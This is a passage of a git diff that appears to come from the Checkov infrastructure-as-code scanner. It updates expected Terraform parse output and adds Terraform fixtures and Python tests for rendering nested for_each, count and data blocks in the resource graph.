+          "__address__": "module.s3_module[\"a\"].module.inner_s3_module2.bucket2"
         }
       }
     ]
@@ -542,7 +578,7 @@
     "locals": [
       {
         "bucket2": [
-          "var.bucket2"
+          ""
         ],
         "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.bucket2"
       }
@@ -560,7 +596,7 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              ""
             ],
             "ignore_public_acls": [
               true
@@ -568,7 +604,8 @@
             "restrict_public_buckets": [
               true
             ],
-            "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket"
+            "__address__": "module.s3_module[\"b\"].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket",
+            "__provider_address__": ""
           }
         }
       }
@@ -586,71 +623,13 @@
       }
     ]
   },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": {
-    "module": [
-      {
-        "inner_s3_module": {
-          "__end_line__": 4,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 1,
-          "bucket2": [
-            "var.bucket"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module2[1].inner_s3_module"
-        }
-      },
-      {
-        "inner_s3_module2": {
-          "__end_line__": 9,
-          "__resolved__": [
-            "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}"
-          ],
-          "__start_line__": 6,
-          "bucket2": [
-            "var.bucket2"
-          ],
-          "source": [
-            "./module2"
-          ],
-          "__address__": "module.s3_module2[1].inner_s3_module2"
-        }
-      }
-    ],
-    "variable": [
-      {
-        "bucket": {
-          "__end_line__": 14,
-          "__start_line__": 12,
-          "type": [
-            "string"
-          ],
-          "__address__": "module.s3_module2[1].bucket"
-        }
-      },
-      {
-        "bucket2": {
-          "__end_line__": 18,
-          "__start_line__": 16,
-          "type": [
-            "string"
-          ],
-          "__address__": "module.s3_module2[1].bucket2"
-        }
-      }
-    ]
-  },
-  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": {
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
     "locals": [
       {
         "bucket2": [
-          "var.bucket"
+          true
         ],
-        "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2"
+        "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2"
       }
     ],
     "resource": [
@@ -666,7 +645,7 @@
               true
             ],
             "bucket": [
-              "var.bucket"
+              true
             ],
             "ignore_public_acls": [
               true
@@ -674,7 +653,8 @@
             "restrict_public_buckets": [
               true
             ],
-            "__address__": "module.s3_module2[1].module.inner_s3_module.aws_s3_bucket_public_access_block.var_bucket"
+            "__address__": "module.s3_module2[0].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket",
+            "__provider_address__": ""
           }
         }
       }
@@ -687,7 +667,7 @@
           "type": [
             "string"
           ],
-          "__address__": "module.s3_module2[1].module.inner_s3_module.bucket2"
+          "__address__": "module.s3_module2[0].module.inner_s3_module2.bucket2"
         }
       }
     ]
@@ -696,7 +676,7 @@
     "locals": [
       {
         "bucket2": [
-          "var.bucket2"
+          true
         ],
         "__address__": "module.s3_module2[1].module.inner_s3_module2.bucket2"
       }
@@ -714,7 +694,7 @@
               true
             ],
             "bucket": [
-              "var.bucket2"
+              true
             ],
             "ignore_public_acls": [
               true
@@ -722,7 +702,8 @@
             "restrict_public_buckets": [
               true
             ],
-            "__address__": "module.s3_module2[1].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket"
+            "__address__": "module.s3_module2[1].module.inner_s3_module2.aws_s3_bucket_public_access_block.var_bucket",
+            "__provider_address__": ""
           }
         }
       }
@@ -739,5 +720,32 @@
         }
       }
     ]
+  },
+  "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/parser_dup_nested/variable.tf\", \"tf_source_modules\": null}": {
+    "variable": [
+      {
+        "count_var": {
+          "__end_line__": 4,
+          "__start_line__": 2,
+          "default": [
+            2
+          ],
+          "__address__": "count_var"
+        }
+      },
+      {
+        "foreach_var": {
+          "__end_line__": 8,
+          "__start_line__": 6,
+          "default": [
+            [
+              "a",
+              "b"
+            ]
+          ],
+          "__address__": "foreach_var"
+        }
+      }
+    ]
   }
 }
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf
new file mode 100644
index 00000000000..630b9b5e172
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/main.tf
@@ -0,0 +1,6 @@
+module "level2" {
+  source   = "../level2_module"
+  for_each = var.file_map1_level1
+
+  times_to_duplicate_bucket = var.number_of_required_resources_var
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf
new file mode 100644
index 00000000000..4af133126f8
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level1_module/variables.tf
@@ -0,0 +1,7 @@
+variable "file_map1_level1" {
+  type = map(string)
+}
+
+variable "number_of_required_resources_var" {
+  type = number
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf
new file mode 100644
index 00000000000..25c80ee2ef5
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/main.tf
@@ -0,0 +1,6 @@
+resource "aws_s3_bucket_object" "this_file" {
+  count = var.times_to_duplicate_bucket
+  bucket   = "your_bucket_name"
+  key      = each.key
+  source   = each.value
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf
new file mode 100644
index 00000000000..e1e257b40fc
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/level2_module/variables.tf
@@ -0,0 +1,3 @@
+variable "times_to_duplicate_bucket" {
+  type = number
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf
new file mode 100644
index 00000000000..4477e9361ae
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/module_foreach_module_foreach_resource_count/main.tf
@@ -0,0 +1,29 @@
+locals {
+  groups = {
+    "blue"  = "blue"
+    "green" = "green"
+  }
+  files_map1 = {
+    "test1.txt" = "test1.txt"
+    "test2.txt" = "test2.txt"
+  }
+  number_of_required_resources = 2
+}
+
+# Expected resources:
+#    module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+#    module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+#    module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+#    module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+#    module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+#    module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+#    module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+#    module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+
+module "level1" {
+  source   = "./level1_module"
+  for_each = local.groups
+
+  file_map1_level1 = local.files_map1
+  number_of_required_resources_var = local.number_of_required_resources
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf b/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf
new file mode 100644
index 00000000000..885a68e53e8
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/count_examples/simple_count/main.tf
@@ -0,0 +1,10 @@
+
+# Expected resources:
+#    module.simple[0].aws_s3_bucket_object.this_file
+
+# Actual resources:
+#    NONE
+module "simple" {
+  source   = "./simple"
+  count = 1
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf b/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf
new file mode 100644
index 00000000000..f81b8cc8f28
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_simple/main.tf
@@ -0,0 +1,14 @@
+data "aws_s3_bucket" "data_list" {
+  for_each = toset(var.test_list.bucket)
+  bucket = each.value
+}
+
+data "aws_s3_bucket" "data_dict" {
+  for_each = var.test_dict.bucket
+  bucket = each.value
+}
+
+data "aws_s3_bucket" "data_count" {
+  count = var.test_count.bucket
+  bucket = count.index
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf b/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf
new file mode 100644
index 00000000000..a96d924bd33
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_simple/variables.tf
@@ -0,0 +1,14 @@
+variable "test_list" {
+  bucket = ["a", "b"]
+}
+
+variable "test_dict" {
+  bucket = {
+    key1 = "a",
+    key2 = "b"
+  }
+}
+
+variable "test_count" {
+  bucket = 2
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf
new file mode 100644
index 00000000000..019ff3cc629
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/data.tf
@@ -0,0 +1,13 @@
+data "aws_s3_bucket" "data_dict" {
+  for_each = var.test_dict.bucket
+  bucket = each.value
+}
+
+data "aws_s3_bucket" "data_count" {
+  count = var.test_count.bucket
+  bucket = count.index
+}
+
+data "aws_s3_bucket" "data" {
+  bucket = "a"
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf
new file mode 100644
index 00000000000..ee85d8b430c
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/main.tf
@@ -0,0 +1,15 @@
+resource "aws_s3_bucket" "data_dict" {
+  for_each = var.test_dict.bucket
+  subnet_id     = each.value
+  bucket = data.aws_s3_bucket.data_dict[each.key].bucket
+}
+
+
+resource "aws_s3_bucket" "data_count" {
+  count = var.test_count.bucket
+  bucket = data.aws_s3_bucket.data_count[count.index].bucket
+}
+
+resource "aws_s3_bucket" "data" {
+  subnet_id     = data.aws_s3_bucket.data.bucket
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf b/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf
new file mode 100644
index 00000000000..02caf819d73
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/data_with_resource/variables.tf
@@ -0,0 +1,10 @@
+variable "test_dict" {
+  bucket = {
+    key1 = "a",
+    key2 = "b"
+  }
+}
+
+variable "test_count" {
+  bucket = 2
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf
new file mode 100644
index 00000000000..067fdda2b06
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/main.tf
@@ -0,0 +1,6 @@
+module "level2" {
+  source   = "../level2_module"
+  for_each = var.file_map1_level1
+
+  file_map_level2 = var.file_map2_level1
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf
new file mode 100644
index 00000000000..4e601f10af0
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level1_module/variables.tf
@@ -0,0 +1,7 @@
+variable "file_map1_level1" {
+  type = map(string)
+}
+
+variable "file_map2_level1" {
+  type = map(string)
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf
new file mode 100644
index 00000000000..7e4ad692554
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/main.tf
@@ -0,0 +1,6 @@
+resource "aws_s3_bucket_object" "this_file" {
+  for_each = var.file_map_level2
+  bucket   = "your_bucket_name"
+  key      = each.key
+  source   = each.value
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf
new file mode 100644
index 00000000000..fc8b1ddfd9d
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/level2_module/variables.tf
@@ -0,0 +1,3 @@
+variable "file_map_level2" {
+  type = map(string)
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf
new file mode 100644
index 00000000000..da719081ea3
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/module_foreach_module_foreach_resource_foreach/main.tf
@@ -0,0 +1,32 @@
+locals {
+  groups = {
+    "blue"  = "blue"
+    "green" = "green"
+  }
+  files_map1 = {
+    "test1.txt" = "test1.txt"
+    "test2.txt" = "test2.txt"
+  }
+  files_map2 = {
+    "test3.txt" = "test3.txt"
+    "test4.txt" = "test4.txt"
+  }
+}
+
+# Expected resources:
+#    module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+#    module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+#    module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+#    module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+#    module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+#    module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+#    module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]
+#    module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]
+
+module "level1" {
+  source   = "./level1_module"
+  for_each = local.groups
+
+  file_map1_level1 = local.files_map1
+  file_map2_level1 = local.files_map2
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf
new file mode 100644
index 00000000000..20e13d97c6c
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/main.tf
@@ -0,0 +1,22 @@
+locals {
+  groups = {
+      "blue" = "blue"
+      "green" = "green"
+  }
+  files_map1 = {
+    "test1" = "test1"
+    "test2" = "test2"
+  }
+}
+
+# Expected resources:
+#    module.files["blue"].aws_s3_bucket_object.this_file["test1.txt"]
+#    module.files["blue"].aws_s3_bucket_object.this_file["test2.txt"]
+#    module.files["green"].aws_s3_bucket_object.this_file["test1.txt"]
+#    module.files["green"].aws_s3_bucket_object.this_file["test2.txt"]
+
+module "files" {
+  source   = "./s3_files"
+  for_each = local.groups
+  file_map = local.files_map1
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf
new file mode 100644
index 00000000000..91db9c71cb6
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/main.tf
@@ -0,0 +1,6 @@
+resource "aws_s3_bucket_object" "this_file" {
+  for_each = var.file_map
+  bucket   = "your_bucket_name"
+  key      = each.key
+  source   = each.value
+}
diff --git a/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf
new file mode 100644
index 00000000000..c7721cd54e3
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/foreach_examples/nested_foreach_based_on_module_locals/s3_files/variables.tf
@@ -0,0 +1,3 @@
+variable "file_map" {
+  type = map(string)
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/child/main.tf b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/child/main.tf
new file mode 100644
index 00000000000..9164a57f720
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/child/main.tf
@@ -0,0 +1,11 @@
+## child/main.tf
+variable "child-name" {
+  type = string
+}
+resource "terraform_data" "child-example" {
+  input = "1"
+}
+output "child-result" {
+  value = terraform_data.child-example.output
+}
+
diff --git a/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/modules.tf b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/modules.tf
new file mode 100644
index 00000000000..c451b5dced7
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/modules.tf
@@ -0,0 +1,9 @@
+# modules.tf
+module "modules" {
+  count = 12
+  source = "./parent"
+  parent   = count.index
+}
+output "modules-result" {
+  value = { for k, v in module.modules-parent : k => v }
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/parent/main.tf b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/parent/main.tf
new file mode 100644
index 00000000000..1005ba13b48
--- /dev/null
+++ b/tests/terraform/graph/variable_rendering/resources/os_example_large_count_with_nested_module/parent/main.tf
@@ -0,0 +1,12 @@
+# parent/main.tf
+variable "parent" {
+  type = string
+}
+module "parent" {
+  source = "../child"
+  child-name   = "1"
+}
+
+output "parent-result" {
+  value = module.parent.child-result
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/test_foreach_renderer.py b/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
index 036e507f094..9ddb2586686 100644
--- a/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
+++ b/tests/terraform/graph/variable_rendering/test_foreach_renderer.py
@@ -387,6 +387,45 @@ def test_foreach_module_and_resource(checkov_source_path):
     assert graph.vertices[9].config['aws_s3_bucket_public_access_block']['var_bucket["b"]']['__address__'] == 'module.s3_module["b"].aws_s3_bucket_public_access_block.var_bucket["b"]'
 
 
+@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True", "CHECKOV_ENABLE_DATAS_FOREACH_HANDLING": "True"})
+def test_foreach_data(checkov_source_path):
+    dir_name = 'data_simple'
+    graph, _ = build_and_get_graph_by_path(dir_name, render_var=True)
+    tf_definitions, _ = convert_graph_vertices_to_tf_definitions(vertices=graph.vertices, root_folder=dir_name)
+
+    assert len([block for block in graph.vertices if block.block_type == 'data']) == 6
+    assert len(tf_definitions[list(tf_definitions.keys())[0]]['data']) == 6
+
+    data_vertices_names = [block.name for block in graph.vertices if block.block_type == 'data']
+    assert 'aws_s3_bucket.data_list["b"]' in data_vertices_names
+    assert 'aws_s3_bucket.data_dict["key1"]' in data_vertices_names
+    assert 'aws_s3_bucket.data_count[0]' in data_vertices_names
+    assert 'aws_s3_bucket.data_list["a"]' in data_vertices_names
+    assert 'aws_s3_bucket.data_dict["key2"]' in data_vertices_names
+    assert 'aws_s3_bucket.data_count[1]' in data_vertices_names
+
+
+@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True", "CHECKOV_ENABLE_DATAS_FOREACH_HANDLING": "True"})
+def test_foreach_data_with_resource(checkov_source_path):
+    dir_name = 'data_with_resource'
+    graph, _ = build_and_get_graph_by_path(dir_name, render_var=True)
+    tf_definitions, _ = convert_graph_vertices_to_tf_definitions(vertices=graph.vertices, root_folder=dir_name)
+
+    assert len([block for block in graph.vertices if block.block_type == 'data']) == 5
+    assert len(tf_definitions[list(tf_definitions.keys())[0]]['data']) == 5
+
+    data_vertices_names = [block.name for block in graph.vertices if block.block_type == 'data']
+    assert 'aws_s3_bucket.data_dict["key1"]' in data_vertices_names
+    assert 'aws_s3_bucket.data_count[0]' in data_vertices_names
+    assert 'aws_s3_bucket.data_dict["key2"]' in data_vertices_names
+    assert 'aws_s3_bucket.data_count[1]' in data_vertices_names
+
+    assert graph.vertices[0].attributes['bucket'] == graph.vertices[3].attributes['bucket']
+    assert graph.vertices[1].attributes['bucket'] == graph.vertices[4].attributes['bucket']
+    assert graph.vertices[8].attributes['bucket'] == graph.vertices[10].attributes['bucket']
+    assert graph.vertices[9].attributes['bucket'] == graph.vertices[11].attributes['bucket']
+
+
 @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True"})
 def test_foreach_module_with_more_than_two_resources(checkov_source_path):
     dir_name = 'foreach_module_with_more_than_two_resources'
@@ -422,6 +461,13 @@ def test_foreach_with_lookup():
     assert graph.vertices[1].attributes.get('uniform_bucket_level_access') == [True]
 
 
+@mock.patch.dict(os.environ, {"CHECKOV_ENABLE_MODULES_FOREACH_HANDLING": "True"})
+def test_foreach_large_count_with_nested_module(checkov_source_path):
+    dir_name = 'os_example_large_count_with_nested_module'
+    graph, _ = build_and_get_graph_by_path(dir_name, render_var=True)
+    assert len(graph.vertices) == 85
+
+
 def test__get_tf_module_with_no_foreach():
     module = TFModule(name='1', path='1', foreach_idx='1',
                       nested_tf_module=TFModule(name='2', path='2', foreach_idx='2', nested_tf_module=None))
@@ -441,8 +487,89 @@ def test__get_module_with_only_relevant_foreach_idx():
                             nested_tf_module=TFModule(name='3', path='3', foreach_idx='3', nested_tf_module=None))
     result = ForeachModuleHandler._get_module_with_only_relevant_foreach_idx('test', original_key, module)
     assert result == TFModule(name='1', path='1', foreach_idx='1',
-                      nested_tf_module=TFModule(name='2', path='2', foreach_idx='test',
-                                                nested_tf_module=TFModule(name='3', path='3', foreach_idx='3',
-                                                                          nested_tf_module=None)
-                                                )
-                      )
+                              nested_tf_module=TFModule(name='2', path='2', foreach_idx='test',
+                                                        nested_tf_module=TFModule(name='3', path='3', foreach_idx='3',
+                                                                                  nested_tf_module=None)
+                                                        )
+                              )
+
+def test_nested_foreach_with_variable_reference():
+    """
+    Here we test that a nested foreach loop based on module locals is correctly rendered in the Terraform graph.
+    """
+    resources_by_group_local_var = 2
+    resources_by_files_local_var = 2
+
+    dir_name = 'foreach_examples/nested_foreach_based_on_module_locals'
+    graph = build_and_get_graph_by_path(dir_name)[0]
+    graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices)
+    graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter))
+
+    assert len(graph_resources_created) is (resources_by_group_local_var * resources_by_files_local_var)
+    assert graph_resources_created == ['module.files["blue"].aws_s3_bucket_object.this_file["test1"]',
+                                       'module.files["green"].aws_s3_bucket_object.this_file["test1"]',
+                                       'module.files["blue"].aws_s3_bucket_object.this_file["test2"]',
+                                       'module.files["green"].aws_s3_bucket_object.this_file["test2"]']
+
+
+def test_double_nested_foreach_with_variable_reference():
+    """
+    Here we test that a 2 level nested foreach loop based on module local vars is correctly rendered in the Terraform graph.
+
+    In this test we have 2 x level1 modules (green, blue) each has 2 level2 modules (test1.txt, test2.txt)
+    and 2 resources for each (test3.txt, test4.txt).
+    So (2 x level1) -> (2 x level2) -> (2 x aws_s3_bucket resource).
+
+    The unique use case is that the for_each attributes depends on the main module's local variables.
+    """
+    dir_name = 'foreach_examples/module_foreach_module_foreach_resource_foreach'
+    graph = build_and_get_graph_by_path(dir_name)[0]
+
+    graph_modules_filter = filter(lambda blk: blk.block_type == 'module', graph.vertices)
+    graph_modules_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_modules_filter))
+
+    graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices)
+    graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter))
+
+    assert len(graph_modules_created) is 6    # 2 level1 modules, each has 2 level2 modules (total of 2 + 2*2 = 6)
+    assert len(graph_resources_created) is 8  # 4 level2 modules, each has 2 resources (total of 2*2*2 = 8)
+
+    assert graph_resources_created == ['module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]',
+                                       'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test3.txt"]',
+                                       'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]',
+                                       'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test3.txt"]',
+                                       'module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]',
+                                       'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file["test4.txt"]',
+                                       'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]',
+                                       'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file["test4.txt"]']
+
+
+def test_double_nested_foreach_and_count_with_variable_reference():
+    """
+    Here we test that a 2 level nested foreach loop and count based on module locals is correctly rendered in the Terraform graph.
+    In this test we have 2 x level1 modules (green, blue) each has 2 level2 modules (test1.txt, test2.txt)
+    and 2 resources for each (count of 2).
+    So (2 x level1) -> (2 x level2) -> (2 x aws_s3_bucket resource: count = 2).
+
+    The unique use case is that the count and for_each attributes (multiple levels) depends on the main module's local variables.
+    """
+    dir_name = 'count_examples/module_foreach_module_foreach_resource_count'
+    graph = build_and_get_graph_by_path(dir_name)[0]
+
+    graph_modules_filter = filter(lambda blk: blk.block_type == 'module', graph.vertices)
+    graph_modules_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_modules_filter))
+
+    graph_resources_filter = filter(lambda blk: blk.block_type == 'resource', graph.vertices)
+    graph_resources_created = list(map(lambda rsrc: rsrc.attributes['__address__'], graph_resources_filter))
+
+    assert len(graph_modules_created) is 6    # 2 level1 modules, each has 2 level2 modules (total of 2 + 2*2 = 6)
+    assert len(graph_resources_created) is 8  # 4 level2 modules, each has 2 resources (total of 2*2*2 = 8)
+
+    assert graph_resources_created == ['module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]',
+                                       'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[0]',
+                                       'module.level1["blue"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[0]',
+                                       'module.level1["green"].module.level2["test2.txt"].aws_s3_bucket_object.this_file[0]',
+                                       'module.level1["blue"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[1]',
+                                       'module.level1["green"].module.level2["test1.txt"].aws_s3_bucket_object.this_file[1]',
